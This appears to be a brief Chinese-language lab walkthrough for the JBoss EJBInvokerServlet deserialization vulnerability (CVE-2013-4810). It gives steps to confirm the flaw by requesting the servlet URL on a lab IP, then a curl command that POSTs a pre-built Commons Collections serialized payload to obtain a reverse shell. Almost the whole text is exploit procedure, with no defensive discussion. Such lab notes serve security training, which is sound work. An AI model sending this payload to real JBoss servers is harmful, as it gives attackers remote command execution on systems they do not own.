JBoss EJBInvokerServlet CVE-2013-4810 反序列化漏洞
开启环境
访问http://172.16.1.183:8080/invoker/EJBInvokerServlet下载下来了说明漏洞存在
利用生成的.ser文件,通过POST 二进制数据上去,反向连接shell
curl http://192.168.10.154:8080/invoker/EJBInvokerServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser